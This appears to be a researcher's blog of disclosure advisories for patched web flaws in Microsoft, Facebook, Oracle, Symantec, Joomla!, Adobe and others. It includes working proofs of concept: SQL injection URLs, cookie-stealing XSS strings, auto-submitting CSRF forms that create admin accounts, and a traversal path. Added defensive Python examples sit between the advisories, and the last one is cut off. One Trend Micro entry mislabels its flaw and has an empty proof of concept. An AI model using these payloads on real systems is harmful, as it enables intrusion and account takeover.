facebook Password Reset Vulnerability Found in
Wednesday, 11 July 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Posted on 19:44 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof-of-concept URLs, each of which causes a time delay of 25 seconds, are provided below:
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en


Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575
Posted in Microsoft, SQL Injection | No comments

Thursday, 10 May 2012

Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 21:22 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat
Posted in Arbitrary File Upload, Facebook | No comments

Thursday, 3 May 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 02:17 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat
Posted in Arbitrary File Upload, Facebook | No comments

Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com

Posted on 02:04 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E



Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575
Posted in Microsoft, XSS | No comments

Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 01:50 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat
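As an added illustration (not code from the Facebook endpoint or from the advisory), here is a filename sanitiser that rejects the three names used in the three attachments.facebook.com reports on this page: `..exe`, `notepad.exe.` and `notepad.EXE`. The allowed-extension set and the naming rules are assumptions for the example.

```python
import re

# Extensions this hypothetical attachment endpoint is willing to store.
# The set is an assumption for the example, not any site's real policy.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}


def sanitize_upload_name(client_filename):
    """Return a safe storage name for an uploaded file, or None to reject it.

    Handles the three filename tricks from the advisories: "..exe" (no stem),
    "notepad.exe." (trailing dot, which Windows drops when the file is written)
    and "notepad.EXE" (case variation of an executable extension).
    """
    # 1. Drop any client-supplied directory part, whichever separator it uses.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    # 2. Windows silently removes trailing dots and spaces when creating a file,
    #    so "notepad.exe." lands on disk as "notepad.exe"; strip them before
    #    looking at the extension. Leading dots go too, so "..exe" cannot hide
    #    an empty stem behind a dotfile-style name.
    name = name.strip(" .")
    if not name or "\x00" in name:
        return None
    # 3. Require a stem and an extension; the extension is the last component.
    if "." not in name:
        return None
    stem, ext = name.rsplit(".", 1)
    # 4. Compare the extension case-insensitively against an allow list
    #    (not a block list of "exe", "scr", ... that a new casing can dodge).
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return None
    # 5. Neutralise inner dots ("shell.php.png") and odd characters in the stem.
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)
    if not stem:
        return None
    return f"{stem}.{ext}"
```

The two choices that matter are stripping trailing dots and spaces before the extension check (a block-list test on the raw name passes `notepad.exe.`) and comparing against an allow list case-insensitively. Storing the file under a server-generated name and serving it with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` limits the damage if a check is ever bypassed.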
Posted in Arbitrary File Upload, Facebook | 17 comments

Sunday, 29 April 2012

Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com

Posted on 02:38 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0


Conclusion
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.

Twitter White Hat

https://twitter.com/about/security
Posted in Twitter, XSS | No comments

Apple Bug #1: Cross-Site Scripting (XSS) Found in consultants.apple.com

Posted on 02:27 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting (XSS) vulnerability in consultants.apple.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
http://consultants.apple.com/au/locator_results.php?sl=AU&citystate=VIC&page=2<script>alert(document.cookie)</script>


Conclusion
This vulnerability has been confirmed and patched by Apple Security Team. I would like to thank them for their quick response to my report.

Apple White Hat

http://support.apple.com/kb/HT1318
Posted in Apple, XSS | No comments

Saturday, 28 April 2012

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Posted on 21:01 by freda
Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.


Proof of concept
Reflected XSS
===========
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
  • http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
=========
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
  • http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
=================
http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=

Solution
Oracle has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.
Posted in Oracle, XSS | No comments

Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Posted on 12:50 by freda
Description
Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other earlier versions may also be affected.


Proof of concept
Reflected XSS
===========
http://[target]:8161/demo/portfolioPublish?count=1&refresh='"--></style></script><script>alert(/XSS/)</script>&stocks=SUNW

Permanent XSS
============
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"

To trigger Permanent XSS:
====================
http://[target]:8161/camel/endpoints



Solution
Update to version 2.7.2 or later.

Reference

Vendor URL: https://issues.apache.org/jira/browse/CAMEL-3991

Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.
Posted in Apache, XSS | No comments

HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability

Posted on 11:40 by freda
Description
HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Request Forgery vulnerability in HP System Management Homepage. This issue was discovered in a default installation of HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.


Proof of concept
<html>
<body>
<form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post">
<input type="hidden" name="admin-group" value="Users" />
<input type="hidden" name="operator-group" value="" />
<input type="hidden" name="user-group" value="" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
HP has provided HP System Management Homepage v7.0 or later to resolve the vulnerabilities. Please see the references for more information.

References

Vendor URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632
Secunia: http://secunia.com/advisories/43012/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2012-04-11 - Advisory published by Secunia, since it had been coordinated for more than a year.
2012-04-19 - Patch released.
2012-04-20 - Advisory updated by Secunia.
Posted in CSRF, HP | No comments

Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability

Posted on 11:17 by freda
Description
Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.

Stratsec vulnerability researcher Sow Ching Shiong has discovered a Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.

Proof-of-concept URLs, each of which causes a time delay of 30 seconds, are provided below:
  • http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
  • http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
  • http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
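The careers.microsoft.com and Joomla! reports on this page both rest on the same defect: a request parameter spliced into SQL text. The following example is added here and is not Joomla!'s or Microsoft's code; it uses an in-memory SQLite table (constructed sample data) to show the difference between concatenation and a parameterised query when the Joomla! probe string is supplied. SQLite has no `SLEEP()`, so instead of a 30-second delay the concatenated version raises an error, which is enough to prove the injected text reached the SQL parser; the bound version treats the same string as a search term.

```python
import sqlite3


def make_db():
    """Constructed sample table for the example (not data from the advisory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [(1, "Welcome"), (2, "Smart Search"), (3, "Extensions")])
    return conn


# The time-based probe from the advisory URLs, percent-decoded.
PAYLOAD = "Search'+(SELECT 1 FROM (SELECT SLEEP(30))A)+'"


def search_vulnerable(conn, term):
    """String concatenation: the term becomes part of the SQL statement."""
    sql = "SELECT id FROM content WHERE title LIKE '%" + term + "%'"
    try:
        return "ok", [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        # SQLite rejects the unknown SLEEP() function at prepare time; on a
        # MySQL backend the same text would instead stall for 30 seconds.
        return "error", str(exc)


def search_safe(conn, term):
    """Parameterised query: the term is bound as data and never parsed as SQL."""
    rows = conn.execute("SELECT id FROM content WHERE title LIKE ?",
                        ("%" + term + "%",))
    return "ok", [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "Search"))   # benign term: ('ok', [2])
    print(search_vulnerable(db, PAYLOAD))    # probe reaches the parser: ('error', ...)
    print(search_safe(db, PAYLOAD))          # probe is just a string: ('ok', [])
```

The same principle applies to the `1));WAITFOR DELAY '0:0:25'--` probe against SQL Server: a parameter bound with a placeholder cannot close the surrounding parentheses or start a new statement, whatever its contents.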

Solution
Update to version 2.5.2 or later.

References

Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)

Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.
Posted in SQL Injection | No comments

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 10:28 by freda
Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.


Proof of concept
SQL Injection
==========

http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--



Cross-Site Scripting (XSS)
====================

  • http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
  • http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
  • http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E



Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.
Posted in SQL Injection, Symantec, XSS | No comments

Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability

Posted on 10:01 by freda
Description
Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting vulnerability in Pligg CMS. This issue was discovered in a default installation of Pligg CMS 1.1.4. Other earlier versions may also be affected.


Proof of concept
http://[target]/pligg/search.php?adv=1&advancesearch=&nbsp;Search&nbsp;&date=1</title><script>alert(/XSS/)</script>&scategory=1&scomments=1&search=&sgroup=3&slink=3&stags=1&status=all&suser=1

Solution
Update to version 1.2.0 or later.

References

Vendor URL: http://forums.pligg.com/downloads.php?do=file&id=13
Secunia: http://secunia.com/advisories/44352/

Disclosure Timeline
2011-04-24 - Vulnerability discovered.
2011-04-24 - Vulnerability reported to Secunia.
2011-04-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-09-18 - Patch released.
2011-09-20 - Advisory published by Secunia.
Posted in XSS | No comments

Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 07:30 by freda
Description
Symantec Endpoint Protection Manager Console lets users centrally manage the Symantec Endpoint Protection clients. From the console, users can install clients, set and enforce a security policy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================

<html>
<body>
<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
  • https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>


Solution
Symantec has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
Secunia: http://secunia.com/advisories/43662/

Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.
Posted in CSRF, Symantec, XSS | No comments

Friday, 27 April 2012

Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Posted on 19:11 by freda
Description
Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.


Proof of concept
Cross-Site Request Forgery (CSRF)
==========================

<html>
<body>
<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

  • https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
  • https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))


Solution
Oracle has released patches which address these issues. Please see the references for more information.

References

Vendor URL: http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
Secunia: http://secunia.com/advisories/43011/

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - Patch released.
2011-07-20 - Advisory published by Secunia.
Posted in CSRF, Oracle, XSS | No comments

Trend Micro Control Manager 5.5 Directory Traversal Vulnerability

Posted on 18:44 by freda
Description
Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.


Proof of concept




Solution
Trend Micro has released patches which address this issue. Please see the references for more information.

References

Vendor URL: http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845
Secunia: http://secunia.com/advisories/44134/

Disclosure Timeline
2011-04-09 - Vulnerability discovered.
2011-04-09 - Vulnerability reported to Secunia.
2011-04-29 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-15 - Patch released.
2011-06-16 - Advisory published by Secunia.
Posted in Directory Traversal, Trend Micro | No comments

Trend Micro Control Manager 5.5 Cross-Site Scripting (XSS) Vulnerability

Posted on 18:39 by freda

Description
Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.


Proof of concept
https://[target]/commoncgi/servlet/CCGIServlet?ApHost=SLF_PRODUCT_TVCS"><script>alert(/XSS/)</script>&CGIAlias=SLF_PRODUCT_TVCS&Page=

Solution
Trend Micro has released patches which address this issue. Please see the references for more information.

References

Vendor URL: http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845
Secunia: http://secunia.com/advisories/44134/

Disclosure Timeline
2011-04-09 - Vulnerability discovered.
2011-04-09 - Vulnerability reported to Secunia.
2011-04-28 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-15 - Patch released.
2011-06-16 - Advisory published by Secunia.
Posted in Trend Micro, XSS | No comments

Wednesday, 25 April 2012

Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability

Posted on 02:12 by freda
Description
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.

Sow Ching Shiong, an independent vulnerability researcher, has discovered a Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.


Proof of concept
<html>
<body>
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">
<input type="hidden" name="uname" value="attacker" />
<input type="hidden" name="password1" value="passwd123" />
<input type="hidden" name="password2" value="passwd123" />
<input type="hidden" name="Description" value="" />
<input type="hidden" name="userallowrds" value="true" />
<input type="hidden" name="userallowadministrative" value="true" />
<input type="hidden" name="userallow" value="adminapi" />
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />
<input type="hidden" name="adminaction" value="add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
Adobe has released patches which address this issue. Please see the references for more information.

References

Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.
Posted in Adobe, CSRF | No comments

Sybase EAServer 6.3.1 Directory Traversal Vulnerability

Posted on 01:19 by freda
Description
Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.

Sow Ching Shiong, an independent vulnerability researcher, has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.

Proof of concept
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
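The proof-of-concept path above mixes forward slashes, backslashes and `.\..` segments, which is exactly the shape that defeats a naive check for the literal string `../`. As an added example (not EAServer's code; the web root and request paths are constructed for illustration), here is a path-mapping routine that decodes the request once, treats both separators alike, collapses dot segments and refuses anything that climbs above the document root. It uses `posixpath` rather than `os.path` so the result is the same on every platform.

```python
import posixpath
import re
from urllib.parse import unquote


def resolve_under_root(web_root, request_path):
    """Map a request path onto a file under web_root, or return None to refuse.

    Pure-posixpath logic so the outcome is identical on Windows and Unix; a
    real server would additionally realpath() the result to defeat symlinks.
    """
    # Decode percent-encoding once (%2e%2e -> ..) and refuse NUL bytes, which
    # truncate the path in C-level file APIs.
    p = unquote(request_path)
    if "\x00" in p:
        return None
    # Windows file APIs accept "\" as a separator, so treat it as one here too;
    # otherwise ".\..\" segments look like ordinary file names.
    p = p.replace("\\", "/")
    # Refuse drive-letter absolute targets (C:\boot.ini) outright.
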